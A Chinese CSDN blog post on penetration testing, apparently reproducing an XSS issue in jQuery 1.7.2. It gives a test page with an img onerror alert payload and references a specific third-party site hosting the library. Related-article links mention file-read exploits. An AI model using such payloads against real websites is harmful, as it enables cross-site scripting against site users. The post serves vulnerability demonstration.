jquery-1.7.2.min.js XSS漏洞

已于 2022-01-19 11:04:04 修改
阅读量2.6k 收藏 1
点赞数 1
分类专栏: 渗透测试 文章标签: javascript jquery 前端
于 2022-01-19 11:00:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZPFCD/article/details/122576262
版权

测试页面:

<!DOCTYPE html>
<html>
<head>
<script src="http://www.esdkkd.com/js/jquery-1.7.2.min.js"></script>
  <meta charset="utf-8">
  <title>JS Bin</title>
</head>
<body>
JQuery链接: http://www.esdkkd.com/js/jquery-1.7.2.min.js
<script>
  var img = $("<img onerror='alert(22);'>");
	img.attr('src','xx');
</script>
</body>
</html>

K2epUp
关注
专栏目录
jQuery-1.7.2版本存在任意文件读取漏洞
nnn2188185的博客
04-23 1817
jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库,其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件。
漏洞复现】jquery-1.7.2JavaScript代码库任意文件读取
失心少年
01-06 674
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!H3C安全接入网关使用jquery-1.7.2JavaScript代码库(框架),jQuery 1.7.2版本存在任意文件读取漏洞。除此之外,像安博通深度安全网关等使用jquery-1.7.2 JavaScript代码库(框架)的设备同样存在此漏洞
jQuery-1.7.2存在任意文件读取漏洞
fly夏天的博客
12-27 1049
文章复现了jQuery-1.7.2存在任意文件读取漏洞。并提供了简单的利用方法
JQuery-1.7.2.min.js跨站脚本漏洞
weixin_33769125的博客
02-15 5221
测试页面:<!DOCTYPE html><html><head><script src="http://x.x.x.x:80/js/jquery-1.7.2.min.js"></script> <meta charset="utf-8"> <title>JS Bin</title&g...
jQuery-1.7.2任意文件读取漏洞验证利用脚本
04-27
jQuery是一个快速、简洁的JavaScript框架,丰富的Javascript代码库,在其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件。
jquery-1.7.2
03-31
JQuery是继prototype之后又一个优秀的Javascript库。它是轻量级的js库 ,它兼容CSS3,还兼容各种浏览器(IE 6.0+, FF 1.5+, Safari 2.0+, Opera 9.0+)
jquery-1.7.2版
05-29
Jquery是继prototype之后又一个优秀的Javascrīpt框架。它是轻量级的js库(压缩后只有21k) ,它兼容CSS3,还兼容各种浏览器 (IE 6.0+, FF 1.5+, Safari 2.0+, Opera 9.0+)。jQuery使用户能更方便地处理HTML documents、events、实现动画效果,并且方便地为网站提供AJAX交互。jQuery还有一个比较大的优势是,它的文档说明很全,而且各种 应用也说得很详细,同时还有许多成熟的插件可供选择。jQuery能够使用户的html页保持代码和html内容分离,也就是说,不用再在html里面插入一堆js来调用命令了,只需定义id即可。 jQuery由美国人John Resig创建,至今已吸引了来自世界各地的众多javascript高手加入其team,包括来自德国的Jörn Zaefferer,罗马尼亚的Stefan Petre等等。jQuery是继prototype之后又一个优秀的Javascrīpt框架。其宗旨是——WRITE LESS,DO MORE,写更少的代码,做更多的事情。
漏洞复现】jQuery-1.7.2 版本任意文件下载漏洞复现
做自己喜欢的事,并将其发挥到极致!
04-27 2121
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后一个优秀的JavaScript代码库(框架) 于2006年1月由John Resig发布。 jQuery设计的宗旨是 " write Less,Do More" ,即倡导写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、时间处理、动画设计和Ajax交互。
jQuery版本升级踩坑大全
01-19
其实如果早期版本使用不当,可能会有DOMXSS漏洞,非常建议升级到jQuery 1.9.x或以上版本。前段时间我就主导了这件事情,把公司里我们组负责的项目jQuery版本从1.4.2升级到了jQuery 1.11.3。jQuery官方也为类似升级...
漏洞笔记】jQuery跨站脚本
TeamsSix 的 CSDN 空间
11-20 2081
0x00 概述 漏洞名称:jQuery跨站脚本 风险等级:低危 问题类型:使用已知漏洞的组件 0x01 漏洞描述 关于jQueryjQuery是美国程序员John Resig所研发的一套开源、跨浏览器的JavaScript库。该库简化了HTML与JavaScript之间的操作,并具有模块化、插件扩展等特点。 漏洞原理:jQuery中过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 locat...
jquery-1.7.2.min.js
07-11
jquery-1.7.2.min.js
jQuery 1.7.2 正式版, jquery 1.7.2 min.js
06-15
jQuery 1.7.2正式版发布。该版本在1.7.1的基础上修复了大量的bug,并改进了部分功能。而相比于1.7.2 RC1,只修复了一个bug。值得注意的是:如果你正在使用jQuery Mobile,请使用最新的jQuery 1.7.2和jQuery Mobile 1.1这两个版本,因为之前的jQuery Mobile版本还基于jQuery core 1.7.1或更早的版本。 jquery-1.7.2.min.js (minified, production) jquery-1.7.2.js (unminified, debug) jQuery 1.7 正式版已经可以下载使用。jQuery是一个JavaScript库,它简化了HTML文档遍历,事件处理,动画和为网络快速发展的Ajax交互。jQuery 1.7 版本加入了新的事件API .on() 和 .off(),提高了性能,以及为旧版IE浏览器提供了更好的HTML5支持。 同时 Google 及 Microsoft CDN 上的新版本也应该会在一两天内部署完毕。
jquery-1.7.2.jsjquery-1.7.2.min.js 【官方jqueryjs
11-01
jquery-1.7.jsjquery-1.7.2.min.js 【官方jqueryjs
jquery-1.7.2.js免费下载
10-25
Query 1.7.2正式版发布。该版本在1.7.1的基础上修复了大量的bug,并改进了部分功能。而相比于1.7.2 RC1,只修复了一个bug。值得注意的是:如果你正在使用jQuery Mobile,请使用最新的jQuery 1.7.2和jQuery Mobile 1.1这两个版本,因为之前的jQuery Mobile版本还基于jQuery core 1.7.1或更早的版本。 jquery-1.7.2.min.js (minified, production) jquery-1.7.2.js (unminified, debug) jQuery 1.7 正式版已经可以下载使用。jQuery是一个JavaScript库,它简化了HTML文档遍历,事件处理,动画和为网络快速发展的Ajax交互。jQuery 1.7 版本加入了新的事件API .on() 和 .off(),提高了性能,以及为旧版IE浏览器提供了更好的HTML5支持。 同时 Google 及 Microsoft CDN 上的新版本也应该会在一两天内部署完毕
jquery1.7.2中文版
01-19
Query是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(或JavaScript框架)。jQuery设计的宗旨是“write Less,Do More”,即倡导写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。
低版本jQuery导致XSS Nuclei FUZZ POC
afei001
02-15 920
我记得以前用那些漏扫工具时时常会报一个低版本jQuery的安全问题,当时还不会验证。直到有一天,它托梦给我。我悟了。低版本jQuery导致XSS POC文件文末获取。
jQuery 1.7.2 正式发布
weixin_33720956的博客
06-18 264
2019独角兽企业重金招聘Python工程师标准>>> ...
jQuery导致的XSS跨站漏洞
weixin_45908624的博客
11-17 5416
jQuery导致的XSS跨站漏洞
JQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)漏洞复现】
热门推荐
一纸荒芜的博客
10-31 1万+
jquery-xss漏洞复现
jQuery 1.7.2
最新发布
04-11
jQuery 1.7.2是一个JavaScript库,用于简化HTML文档的遍历、事件处理、动画和Ajax操作。它提供了一种简洁的语法和跨浏览器的兼容性,使开发者能够更轻松地操作和操作HTML元素。 1. 将jQuery对象转换为DOM对象[^1]: ```javascript // 先有jQuery对象 var $element = $('.element'); // 使用下标取出相应的DOM对象 var domElement = $element; ``` 2. jQuery 1.7.2版本存在任意文件读取漏洞[^2]。这个漏洞可以被利用来读取服务器上的任意文件。攻击者可以通过构造特定的请求来读取敏感文件,从而获取敏感信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

K2epUp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值